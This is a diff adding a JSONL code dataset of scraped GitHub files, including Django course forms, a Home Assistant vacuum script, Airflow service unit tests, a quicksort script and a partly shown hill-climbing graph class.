diff --git "a/5397.jsonl" "b/5397.jsonl" new file mode 100644--- /dev/null +++ "b/5397.jsonl" @@ -0,0 +1,1511 @@ +{"seq_id":"1139556169","text":"# Vacuum a specific room\n\nroomConfig = {\n 16: [\"hallway\"],\n 17: [\"bedroom\"],\n 18: [\"entrance\"],\n 19: [\"kitchen\"],\n 20: [\"nursery\", \"kids room\"],\n 22: [\"living room\"],\n 23: [\"office\"] \n}\n\nentity_id = data.get(\"entity_id\")\narea = data.get(\"area\").lower()\n\nroomsToClean = []\n\nfor roomNumber, roomNames in roomConfig.items():\n for name in roomNames:\n if name in area: \n roomsToClean.append(int(roomNumber))\n continue\n\nif entity_id is not None and len(roomsToClean) > 0: \n service_data = {\"entity_id\": entity_id, \"command\": \"app_segment_clean\", \"params\": roomsToClean}\n hass.services.call(\"vacuum\", \"send_command\", service_data, False)\n","repo_name":"oscarb/home-assistant-config","sub_path":"python_scripts/vacuum_room.py","file_name":"vacuum_room.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29514198028","text":"#coding:utf-8\n\ndef get_export(packs, name):\n for k, v in packs.iteritems():\n if v.get('export') == name:\n return v\n\n\ndef get_comp(packs, id):\n for k, v in packs.iteritems():\n if v.get('id') == id:\n return v\n\n\ndef id_cmp(x, y):\n return cmp(int(x), int(y))\n\n\ndef show_sprite(tree, root, sprite, package):\n spr_type = sprite['type']\n if spr_type == 'animation':\n ids = sprite['component'].keys()\n ids.sort(id_cmp)\n for i in ids:\n comp = sprite['component'][i]\n id = comp.get('id')\n if id == '65535': # anchor\n name = comp['name']\n child = tree.AppendItem(root, name, ct_type=1)\n tree.CheckItem(child)\n d = tree.GetPyData(root)\n if d:\n n = [x for x in d]\n n.append(name)\n tree.SetPyData(child, n)\n else:\n ref = get_comp(package, id)\n name = comp.get('name', 'index_' + id)\n child = tree.AppendItem(root, name, ct_type=1)\n d = tree.GetPyData(root)\n if d:\n n = [x for x in d]\n n.append(int(i) - 1)\n tree.SetPyData(child, n)\n tree.CheckItem(child)\n\n ref_type = ref['type']\n if ref_type == 'animation':\n show_sprite(tree, child, ref, package)\n","repo_name":"rainfiel/ejoy2dx","sub_path":"tools/editor/pack_tree.py","file_name":"pack_tree.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"79"} +{"seq_id":"18941120754","text":"from django import forms\nfrom .forms_patient import TimeInput\nfrom hc.models import Appointment\n\n\nclass ViewAppointmentForm(forms.ModelForm):\n\n class Meta:\n model = Appointment\n fields = '__all__'\n widgets = {\n 'date': forms.SelectDateWidget(\n empty_label=(\"Choose Year\", \"Choose Month\", \"Choose Day\"),\n ),\n 'time': TimeInput(),\n }\n","repo_name":"vedthakur5/my","sub_path":"hc/forms/forms_receptionist.py","file_name":"forms_receptionist.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17678768242","text":"#imports forms\nfrom datetime import datetime, timedelta\n\nfrom django import forms\nfrom django.contrib.admin.widgets import AdminDateWidget\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import Q\nfrom django.forms import extras\nfrom django.shortcuts import get_object_or_404\nfrom teamwork.apps.profiles.models import *\n\nfrom .models import *\n\n#Choices for term\nTerm_Choice = (('Winter', 'Winter'), ('Spring', 'Spring'), ('Summer', 'Summer'),\n ('Fall', 'Fall'), )\n\nLower_Boundary_Choice = ((0, 'No Preference'), (2, '01:00'), (4, '02:00'), (6, '03:00'),\n (8, '04:00'), (10, '05:00'), (12, '06:00'), (14, '07:00'),\n (16, '08:00'), (18, '09:00'), (20, '10:00'), (22, '11:00'),\n (24, '12:00'), )\n\nUpper_Boundary_Choice = ((48, 'No Preference'), (26, '13:00'), (28, '14:00'), (30, '15:00'),\n (32, '16:00'), (34, '17:00'), (36, '18:00'), (38, '19:00'),\n (40, '20:00'), (42, '21:00'), (44, '22:00'), (46, '23:00'), )\n\ndef ForbiddenNamesValidator(value):\n forbidden_names = ['new', 'join', 'delete', 'create']\n\n if value.lower() in forbidden_names:\n raise ValidationError('This is a reserved word.')\n\n#Creates the course form\nclass CreateCourseForm(forms.ModelForm):\n \"\"\"\n Form used for a user to create a course.\n\n Attributes (Fields):\n name: [CharField] Course name field\n info: [CharField] Course information field\n term: [ChoiceField] List of possible terms\n slug: [CharField] Course slug\n students: [ModelMultipleChoiceField] List of students\n\n Methods:\n __init__ : Initializes form, filtering querysets for fields\n \"\"\"\n\n #Filters queryset based on conditions\n def __init__(self, uid, *args, **kwargs):\n super(CreateCourseForm, self).__init__(*args, **kwargs)\n\n #Renders slug as HiddenInput\n if 'instance' in kwargs:\n self.fields['slug'].widget = forms.HiddenInput()\n self.fields['term'].widget = forms.HiddenInput()\n else:\n self.fields['students'].widget = forms.HiddenInput()\n self.fields['limit_interest'].widget = forms.HiddenInput()\n\n self.fields['name'].validators.append(ForbiddenNamesValidator)\n\n #course name field\n name = forms.CharField(\n #Text input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With length 255\n max_length=255,\n #Field required\n required=True)\n\n #course info field\n info = forms.CharField(\n #Text input\n widget=forms.Textarea(attrs={'class': 'form-control'}),\n #With length 400\n max_length=400,\n #Field Required\n required=True)\n\n #Term field\n term = forms.ChoiceField(\n #Choices from Term_Choice\n choices=Term_Choice,\n #Field Required\n required=True)\n\n #Slug Field\n slug = forms.CharField(\n #Text Input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With Length 20\n max_length=20,\n #Field NOT Required\n required=False)\n\n #Students field\n students = forms.ModelMultipleChoiceField(\n #Multiple Choice Selection\n widget=forms.CheckboxSelectMultiple,\n #From all user objects\n queryset=User.objects.all(),\n #Field NOT Required\n required=False)\n\n #Field for only professor creating courses\n limit_creation = forms.BooleanField(\n #Initially field is false\n initial=False,\n #Labeled as \"Only professor can create projects?\"\n label='Only Professor can create projects?',\n #Field NOT Required\n required=False)\n\n limit_weights = forms.BooleanField(\n label=\"Limit projects to only use specified weights for matches\",\n required=False)\n\n weigh_interest = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of user interest in project\",\n required=False)\n\n weigh_know = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of skills users already know\",\n required=False)\n\n weigh_learn = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of skills users want to learn\",\n required=False)\n\n limit_interest = forms.BooleanField(\n label=\"Disable ability for students to show interest in projects\",\n required=False)\n\n #META CLASS\n class Meta:\n model = Course\n fields = ['name', 'info', 'term', 'students', 'slug', 'limit_creation',\n 'weigh_interest', 'weigh_know', 'weigh_learn', 'limit_weights']\n\n\n#Edit the course form\nclass EditCourseForm(forms.ModelForm):\n \"\"\"\n Form used for a user to create a course.\n\n Attributes (Fields):\n name: [CharField] Course name field\n info: [CharField] Course information field\n term: [ChoiceField] List of possible terms\n slug: [CharField] Course slug\n students: [ModelMultipleChoiceField] List of students\n\n Methods:\n __init__ : Initializes form, filtering querysets for fields\n \"\"\"\n\n #Filters queryset based on conditions\n def __init__(self, uid, slug, *args, **kwargs):\n super(EditCourseForm, self).__init__(*args, **kwargs)\n\n curr_course = Course.objects.filter(slug=slug)\n students_in_course = Enrollment.objects.filter(course=curr_course)\n\n #Renders slug as HiddenInput\n if 'instance' in kwargs:\n self.fields['slug'].widget = forms.HiddenInput()\n self.fields['term'].widget = forms.HiddenInput()\n else:\n self.fields['limit_interest'].widget = forms.HiddenInput()\n\n # get_superuser_list\n superuser = User.objects.filter(is_superuser=True)\n self.fields['name'].validators.append(ForbiddenNamesValidator)\n\n #course name field\n name = forms.CharField(\n #Text input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With length 255\n max_length=255,\n #Field required\n required=True)\n\n #course info field\n info = forms.CharField(\n #Text input\n widget=forms.Textarea(attrs={'class': 'form-control'}),\n #With length 400\n max_length=400,\n #Field Required\n required=True)\n\n #Term field\n term = forms.ChoiceField(\n #Choices from Term_Choice\n choices=Term_Choice,\n #Field Required\n required=False)\n\n #Slug Field\n slug = forms.CharField(\n #Text Input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With Length 20\n max_length=20,\n #Field NOT Required\n required=False)\n\n #Field for only professor creating courses\n limit_creation = forms.BooleanField(\n #Initially field is false\n initial=False,\n #Labeled as \"Only professor can create projects?\"\n label='Only Professor can create projects?',\n #Field NOT Required\n required=False)\n\n limit_weights = forms.BooleanField(\n label=\"Limit projects to only use specified weights for matches\",\n required=False)\n\n weigh_interest = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of user interest in project\",\n required=False)\n\n weigh_know = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of skills users already know\",\n required=False)\n\n weigh_learn = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of skills users want to learn\",\n required=False)\n\n limit_interest = forms.BooleanField(\n label=\"Disable ability for students to show interest in projects\",\n required=False)\n\n #META CLASS\n class Meta:\n model = Course\n fields = ['name', 'info', 'term', 'slug', 'limit_creation',\n 'weigh_interest', 'weigh_know', 'weigh_learn', 'limit_weights']\n\n\n#Creates join course form\nclass JoinCourseForm(forms.ModelForm):\n \"\"\"\n Form used for a user to join a course.\n\n Attributes (Fields):\n code: [CharField] field for user to enter addcode\n\n Methods:\n __init__ : Initializes form\n \"\"\"\n\n #Initializes form\n def __init__(self, uid, *args, **kwargs):\n super(JoinCourseForm, self).__init__(*args, **kwargs)\n\n #Add code field\n code = forms.CharField(\n #Text input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With max length 255\n max_length=255)\n\n #META CLASS\n class Meta:\n model = Course\n fields = ['code']\n\n\ndef UniqueProjectValidator(value):\n if True:\n raise ValidationError('Each choice must be a Unique Project.')\n\n\n# Show Interest Form\nclass ShowInterestForm(forms.ModelForm):\n \"\"\"\n Form used for showing interest in sepcific projects.\n\n Attributes (Fields):\n projects-5: [ModelChoiceField] Project model\n pxr, x 1:5: [CharField] Reason for interest in project\n\n Methods:\n __init__ : gets the current course when initiating form, sets querysets\n clean: custom clean method for form validation\n \"\"\"\n\n #Initializes form\n def __init__(self, uid, *args, **kwargs):\n slug = kwargs.pop('slug')\n super(ShowInterestForm, self).__init__(*args, **kwargs)\n\n # Gets course with certain slug\n cur_course = Course.objects.prefetch_related('projects').get(slug=slug)\n\n # Gets all projects in that course\n projects = cur_course.projects.all().extra(\\\n select={'lower_title':'lower(title)'}).order_by('lower_title')\n\n self.fields['projects'].queryset = projects\n self.fields['projects2'].queryset = projects\n self.fields['projects3'].queryset = projects\n self.fields['projects4'].queryset = projects\n self.fields['projects5'].queryset = projects\n\n # Hides fields based on # projects in course\n if projects.count() < 5:\n self.fields['projects5'].widget = forms.HiddenInput()\n self.fields['p5r'].widget = forms.HiddenInput()\n if projects.count() < 4:\n self.fields['projects4'].widget = forms.HiddenInput()\n self.fields['p4r'].widget = forms.HiddenInput()\n if projects.count() < 3:\n self.fields['projects3'].widget = forms.HiddenInput()\n self.fields['p3r'].widget = forms.HiddenInput()\n if projects.count() < 2:\n self.fields['projects2'].widget = forms.HiddenInput()\n self.fields['p2r'].widget = forms.HiddenInput()\n if projects.count() < 1:\n self.fields['projects'].widget = forms.HiddenInput()\n self.fields['p1r'].widget = forms.HiddenInput()\n\n #Project Choice Field\n projects = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='First Choice', required=False)\n p1r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n projects2 = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='Second Choice', required=False)\n p2r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n projects3 = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='Third Choice', required=False)\n p3r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n projects4 = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='Fourth Choice', required=False)\n p4r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n projects5 = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='Fifth Choice', required=False)\n p5r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n\n # Meta class\n class Meta:\n\n model = Course\n\n fields = ['projects']\n\n # Overrides clean_data for Show_Interest\n def clean(self):\n data = self.cleaned_data\n\n # Initializes a list of projects\n project_list = []\n # Gets data and adds to list\n p1 = data.get('projects')\n p2 = data.get('projects2')\n p3 = data.get('projects3')\n p4 = data.get('projects4')\n p5 = data.get('projects5')\n project_list.append(p1)\n project_list.append(p2)\n project_list.append(p3)\n project_list.append(p4)\n project_list.append(p5)\n\n # Filters None from project list for error checking\n project_list = list(filter(None, project_list))\n\n # Checks for uniqueness\n if len(project_list) != len(set(project_list)):\n self._errors['projects'] = self.error_class(\n ['Choices must be unique!'])\n #raise forms.ValidationError(\"Choices must be unique.\")\n\n return data\n\n\"\"\"\nForm used to simulate sending an email\n\n\"\"\"\nclass EmailRosterForm(forms.Form):\n def __init__(self, *args, **kwargs):\n super(EmailRosterForm, self).__init__(*args, **kwargs)\n\n subject = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=255,\n required=True)\n\n content = forms.CharField(\n widget=forms.Textarea(attrs={'class': 'form-control'}), max_length=2000)\n\n\nclass CourseUpdateForm(forms.ModelForm):\n \"\"\"\n Form used for submitting project updates.\n\n Attributes (Fields):\n update_title: [CharField] Name of project update\n update: [CharField] Project update content\n user: [User] User object associated with form submitter\n\n Methods:\n __init__ : gets the current user when initiating the form\n \"\"\"\n\n # used for filtering the queryset\n def __init__(self, uid, *args, **kwargs):\n super(CourseUpdateForm, self).__init__(*args, **kwargs)\n creator = User.objects.get(id=uid)\n\n title = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=255,\n required=True)\n\n content = forms.CharField(\n widget=forms.Textarea(attrs={'class': 'form-control'}), max_length=2000)\n\n class Meta:\n model = CourseUpdate\n fields = ['title', 'content']\n\nclass AssignmentForm(forms.ModelForm):\n \"\"\"Form used for making a new assignment.\"\"\"\n def __init__(self, uid, slug, *args, **kwargs):\n super(AssignmentForm, self).__init__(*args, **kwargs)\n creator = User.objects.get(id=uid)\n course= get_object_or_404(Course, slug=slug)\n assNum=len(course.assignments.all())\n self.fields['ass_number'].initial = assNum + 1\n\n # date assignment will start\n ass_date = forms.DateField(\n widget = extras.SelectDateWidget,\n input_formats = ['%Y-%m-%d'],\n label=\"Open Date\",\n initial=datetime.date.today()\n )\n # date assignment will end (users can no longer submit)\n due_date = forms.DateField(\n widget = extras.SelectDateWidget,\n input_formats = ['%Y-%m-%d'],\n initial=datetime.date.today() + timedelta(days=7)\n )\n\n # assignment name\n ass_name = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n label=\"Assignment name\",\n required=True,\n max_length=255)\n\n # type of assignment, i.e. tsr\n ass_type = forms.CharField(\n max_length=255,\n label=\"Assignment Type\",\n required=True,\n initial='TSR')\n\n # assignment description\n description = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n label=\"Assignment Description\",\n required=True,\n max_length=255)\n\n # number of assignment, first starts at 1\n ass_number = forms.DecimalField(\n widget=forms.NumberInput(),label='Assignment Number',\n max_digits=2,\n required=True,\n decimal_places=0\n )\n class Meta:\n model= Assignment\n widgets = {\n }\n\n fields = ['ass_date', 'due_date','ass_number','ass_type', 'ass_name','description']\n\n#Edit assignment form\nclass EditAssignmentForm(forms.ModelForm):\n \"\"\"form to edit ass.\"\"\"\n def __init__(self, uid, slug, *args, **kwargs):\n super(EditAssignmentForm, self).__init__(*args, **kwargs)\n creator = User.objects.get(id=uid)\n\n # date assignment will start\n ass_date = forms.DateField(\n widget = extras.SelectDateWidget,\n input_formats = ['%Y-%m-%d'],\n label=\"Open Date\",\n initial=datetime.date.today()\n )\n # date assignment will end (users can no longer submit)\n due_date = forms.DateField(\n widget = extras.SelectDateWidget,\n input_formats = ['%Y-%m-%d'],\n initial=datetime.date.today() + timedelta(days=7)\n )\n\n # assignment name\n ass_name = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n label=\"Assignment name\",\n required=True,\n max_length=255)\n\n # type of assignment, i.e. tsr\n ass_type = forms.CharField(\n max_length=255,\n label=\"Assignment Type\",\n required=True,\n initial='TSR')\n\n # assignment description\n description = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n label=\"Assignment Description\",\n required=True,\n max_length=255)\n\n # number of assignment, first starts at 1\n ass_number = forms.DecimalField(\n widget=forms.NumberInput(),label='Assignment Number',\n max_digits=2,\n required=True,\n decimal_places=0\n )\n class Meta:\n model= Assignment\n widgets = {\n }\n\n fields = ['ass_date', 'due_date','ass_number','ass_type', 'ass_name','description']\n\n\nclass ClaimProjectsForm(forms.Form):\n \"\"\"Form used for TA's to select their projects.\"\"\"\n\n def __init__(self, slug, *args, **kwargs):\n super(ClaimProjectsForm, self).__init__(*args, **kwargs)\n course = Course.objects.get(slug=slug)\n course_projects = course.projects.all()\n\n if len(course_projects) > 1:\n self.fields['all_projects'].choices = course_projects\n self.fields['all_projects'].widget = forms.SelectMultiple\n\n all_projects = forms.ChoiceField(\n label=\"All Projects\",\n required=False\n )\n\n claimed_projects = forms.ChoiceField(\n label=\"Claimed Projects\",\n required=False\n )\n\n class Meta:\n model = Course\n fields = ['all_projects', 'claimed_projects']\n","repo_name":"grepthink/grepthink","sub_path":"teamwork/apps/courses/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":18976,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"} +{"seq_id":"19330511630","text":"import time\n\nfrom concurrent import futures\nfrom oslo_log import log as logging\nfrom oslo_config import cfg\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\n\n\ndef default_executor():\n thread_count = 5\n try:\n thread_count = CONF['service:worker'].threads\n except Exception:\n pass\n\n return futures.ThreadPoolExecutor(thread_count)\n\n\nclass Executor(object):\n \"\"\"\n Object to facilitate the running of a task, or a set of tasks on an\n executor that can map multiple tasks across a configurable number of\n threads\n \"\"\"\n def __init__(self, executor=None):\n self._executor = executor or default_executor()\n\n @staticmethod\n def do(task):\n return task()\n\n def task_name(self, task):\n if hasattr(task, 'task_name'):\n return str(task.task_name)\n if hasattr(task, 'func_name'):\n return str(task.func_name)\n return 'UnnamedTask'\n\n def run(self, tasks):\n \"\"\"\n Run task or set of tasks\n :param tasks: the task or tasks you want to execute in the\n executor's pool\n\n :return: The results of the tasks (list)\n\n If a single task is pass\n \"\"\"\n self.start_time = time.time()\n\n if callable(tasks):\n tasks = [tasks]\n results = [r for r in self._executor.map(self.do, tasks)]\n\n self.end_time = time.time()\n self.task_time = self.end_time - self.start_time\n\n task_names = [self.task_name(t) for t in tasks]\n LOG.debug(\"Finished Tasks %(tasks)s in %(time)fs\",\n {'tasks': task_names, 'time': self.task_time})\n\n return results\n","repo_name":"Woody89/designate-private","sub_path":"designate/worker/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"72544203456","text":"\"\"\"Holds the session header and other global variables.\"\"\"\nfrom requests import Session\n\nNONCE = 1 # Counter that must always be increasing\nLOGGED_IN = False # Flag on whether or not the user is logged in.\nUSE_SANDBOX_URLS = False # Flag on whether or not to use sandbox urls.\nRETURN_PARSED_JSON_RESPONSE = False # Flag on whether to automatically parse request responses.\nSECRET_API_KEY = None\n\n# The session object for making get and post requests.\nSESSION = Session()\nSESSION.headers = {\n 'Content-Type': \"text/plain\",\n 'Content-Length': \"0\",\n 'Cache-Control': \"no-cache\"\n}","repo_name":"jmfernandes/robin_stocks","sub_path":"robin_stocks/gemini/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1540,"dataset":"github-code","pt":"79"} +{"seq_id":"14317933345","text":"import random\n\n\ndef play():\n options = ['r', 'p', 's']\n user = input(\"write 'r' for rock, 'p' for paper, 's' for scissors: \")\n computer = random.choice(['r', 'p', 's'])\n # computer=random.choice(options)\n print(f\"computer chose {computer}\")\n if user == computer:\n return 'Its a tie'\n if is_win(user, computer):\n return 'You won!'\n\n return 'You lost'\n\n\ndef is_win(player, opponent):\n if (player == 'r' and opponent == 's') or (player == 's' and opponent == 'p') or (\n player == 'p' and opponent == 'r'):\n return True\n\n\nprint(play())\n","repo_name":"kfirbilu/Python","sub_path":"Rock Paper Scissors/rockPaperScissors.py","file_name":"rockPaperScissors.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"23484441905","text":"from abc import ABC, abstractmethod\nfrom uuid import UUID\nfrom datetime import datetime\nfrom libs.schemas.message import (\n Message,\n)\n\n\nclass IMessageTable(ABC):\n @abstractmethod\n def connect(self) -> None: ...\n\n @abstractmethod\n def get_message(self,\n chat_id: UUID,\n message_timestamp: datetime) -> list[Message]: ...\n\n @abstractmethod\n def get_messages(self,\n chat_id: UUID,\n start_timestamp: datetime | None,\n end_timestamp: datetime | None) -> list[Message]: ...\n\n @abstractmethod\n def create_message(self, message: Message) -> Message: ...\n","repo_name":"nikita-chekalinsky/chat-app","sub_path":"src/microservices/chats/app/services/db/message_table_interface.py","file_name":"message_table_interface.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32427535116","text":"# forms.py\nfrom django import forms\nfrom .models import User\n# from django.db.models import Q\n\n\nclass ShareThoughtForm(forms.Form):\n shared_with = forms.ModelMultipleChoiceField(\n queryset=User.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=False, \n )\n\n # def __init__(self, *args, **kwargs):\n # user = kwargs.pop('user', None)\n # super(ShareThoughtForm, self).__init__(*args, **kwargs)\n \n # if user:\n # self.fields['shared_with'].queryset = User.objects.exclude( Q(id=user.id) | Q(is_superuser=True))\n","repo_name":"Knowledge-Streams-KS/thoughts-thought-streams","sub_path":"Thoughts/thought/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72985320255","text":"import json\nimport os\nfrom pathlib import Path\nfrom composer.airflow import airflow_service\nfrom unittest import TestCase, mock, main\n\n\nclass MockResponse:\n def __init__(self, json_data, status_code, headers, text=None):\n self.json_data = json_data\n self.status_code = status_code\n self.headers = headers\n self.text = text\n\n def json(self):\n return self.json_data\n\n def headers(self):\n return self.headers\n\n def status_code(self):\n return self.status_code\n\n def text(self):\n return self.text\n\n\nclass AirflowServiceTests(TestCase):\n\n @mock.patch('google.auth.transport.requests.AuthorizedSession')\n @mock.patch('flask.Response')\n @mock.patch('requests.get')\n @mock.patch('six.moves.urllib.parse.parse_qs')\n def test_get_airflow_config(self, mock_six_parse, mock_requests_get, mock_flask_response, mock_auth_session):\n with open(os.path.join(os.path.dirname(Path(__file__)), 'airflow_config.json')) as json_file:\n airflow_config = json.load(json_file)\n\n # mock the objects\n mock_flask_response.json.return_value = airflow_config\n mock_six_parse.return_value = airflow_config['query_string']\n mock_auth_session.request.return_value = mock_flask_response\n headers = {\n 'location': airflow_config['query_string']['redirect_uri'][0]\n }\n mock_requests_get.return_value = MockResponse({}, 200, headers)\n\n airflow_svc = airflow_service.AirflowService(\n mock_auth_session,\n os.environ.get('PROJECT_ID'),\n os.environ.get('GCP_LOCATION'),\n os.environ.get('COMPOSER_ENVIRONMENT')\n )\n composer_config = airflow_svc.get_airflow_config()\n assert composer_config is not None\n assert 'name' in composer_config\n assert composer_config['name'] == airflow_config['name']\n assert 'uuid' in composer_config\n assert composer_config['uuid'] == airflow_config['uuid']\n assert 'dagGcsPrefix' in composer_config['config']\n assert composer_config['config']['dagGcsPrefix'] == airflow_config['config']['dagGcsPrefix']\n assert 'client_id' in composer_config['query_string']\n assert composer_config['query_string']['client_id'] == airflow_config['query_string']['client_id']\n\n @mock.patch('google.auth.transport.requests.AuthorizedSession')\n @mock.patch('flask.Response')\n @mock.patch('requests.get')\n @mock.patch('six.moves.urllib.parse.parse_qs')\n def test_get_airflow_dag_gcs(self, mock_six_parse, mock_requests_get, mock_flask_response, mock_auth_session):\n with open(os.path.join(os.path.dirname(Path(__file__)), 'airflow_config.json')) as json_file:\n airflow_config = json.load(json_file)\n\n # mock the objects\n mock_flask_response.json.return_value = airflow_config\n mock_six_parse.return_value = airflow_config['query_string']\n mock_auth_session.request.return_value = mock_flask_response\n headers = {\n 'location': airflow_config['query_string']['redirect_uri'][0]\n }\n mock_requests_get.return_value = MockResponse({}, 200, headers)\n\n airflow_svc = airflow_service.AirflowService(\n mock_auth_session,\n os.environ.get('PROJECT_ID'),\n os.environ.get('GCP_LOCATION'),\n os.environ.get('COMPOSER_ENVIRONMENT')\n )\n\n dag_gcs_path = airflow_svc.get_airflow_dag_gcs()\n assert dag_gcs_path is not None\n assert dag_gcs_path == 'gs://europe-west3-composer-1b28efe1-bucket/dags'\n\n @mock.patch('google.auth.transport.requests.AuthorizedSession')\n @mock.patch('flask.Response')\n @mock.patch('requests.get')\n @mock.patch('six.moves.urllib.parse.parse_qs')\n def test_get_airflow_experimental_api(self, mock_six_parse, mock_requests_get, mock_flask_response, mock_auth_session):\n with open(os.path.join(os.path.dirname(Path(__file__)), 'airflow_config.json')) as json_file:\n airflow_config = json.load(json_file)\n\n # mock the objects\n mock_flask_response.json.return_value = airflow_config\n mock_six_parse.return_value = airflow_config['query_string']\n mock_auth_session.request.return_value = mock_flask_response\n headers = {\n 'location': airflow_config['query_string']['redirect_uri'][0]\n }\n mock_requests_get.return_value = MockResponse({}, 200, headers)\n\n airflow_svc = airflow_service.AirflowService(\n mock_auth_session,\n os.environ.get('PROJECT_ID'),\n os.environ.get('GCP_LOCATION'),\n os.environ.get('COMPOSER_ENVIRONMENT')\n )\n\n airflow_ui, client_id = airflow_svc.get_airflow_experimental_api()\n assert airflow_ui is not None\n assert client_id is not None\n assert airflow_ui == 'https://sde120c7fa68ea00ep-tp.appspot.com/api/experimental'\n assert client_id == '401501771865-j04v42mav328ocngb267ts6mlh82j8uk.apps.googleusercontent.com'\n\n @mock.patch('composer.utils.auth_service.get_id_token')\n @mock.patch('requests.request')\n def test_trigger_dag(self, mock_request, mock_auth_service):\n mock_auth_service.return_value = 'fake_id_token'\n mock_request.return_value = MockResponse({}, 200, {}, \"mock_response_text\")\n airflow_svc = airflow_service.AirflowService(\n 'fake_auth_session',\n os.environ.get('PROJECT_ID'),\n os.environ.get('GCP_LOCATION'),\n os.environ.get('COMPOSER_ENVIRONMENT')\n )\n res_text = airflow_svc.trigger_dag('mock_dag_name', 'mock_airflow_ui', ',mock_client_id')\n assert res_text is not None\n assert res_text == \"mock_response_text\"\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"damianmcdonald/composer-dag-dsl","sub_path":"composer-test/unit/airflow/airflow_service_test.py","file_name":"airflow_service_test.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73734662975","text":"#快速排序算法,快排算法需要注意的是比较基准数大小需要送右边开始比较!!!\nimport time\nimport random\n#arr = [5,12,6,25,34,15,8,9,7,2,31,22,74]\narr = []\nfor i in range(0,999):\n arr.append(random.randrange(1 , round(time.time()/100),1))\ndef quicksort(left,right):\n if left > right:\n return\n a = arr[left]\n i = left\n j = right\n while i != j:\n while arr[j] >= a and i < j:\n j = j-1\n while arr[i] <= a and i < j:\n i = i+1\n if i < j:\n t = arr[i]\n arr[i] = arr[j]\n arr[j] = t\n \n arr[left] = arr[i]\n arr[i] = a \n quicksort(left,i-1)\n quicksort(i+1,right)\n\nquicksort(0,998)\n\nprint (arr)\n","repo_name":"brave-orange/python_learning","sub_path":"src/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"29793048651","text":"#Hill Climbing Algorithm\n\nfrom collections import defaultdict\n\nclass Graph:\n def __init__(self, total_vertices):\n global start\n self.graph = defaultdict(list)\n self.vertices = total_vertices\n self.explored = []\n self.total_cost = 0\n self.path_for_climbing = []\n\n def add_edge(self, u, v):\n self.graph[u].append(v)\n\n def add_all_edges(self):\n g.add_edge('A', 'B')\n g.add_edge('A', 'C')\n g.add_edge('A', 'D')\n g.add_edge('B', 'A')\n g.add_edge('B', 'C')\n g.add_edge('B', 'D')\n g.add_edge('C', 'A')\n g.add_edge('C', 'B')\n g.add_edge('C', 'D')\n g.add_edge('D', 'A')\n g.add_edge('D', 'B')\n g.add_edge('D', 'C')\n\n def add_values(self):\n actualValues = {'AB': 25, 'AD': 15, 'BD': 45, 'BC': 10, 'CD': 5, 'AC': 10, 'BA': 25, 'DA': 15, 'DB': 45,\n 'CB': 10, 'DC': 5, 'CA': 10, }\n\n def find_actual_path_value(self, optimal_path):\n for i in range(len(optimal_path)-1):\n self.total_cost += g.add_values([optimal_path[i]+optimal_path[i+1]])\n return self.total_cost\n\n def all_sol(self,explored, visited):\n self.explored.append(visited)\n for i in 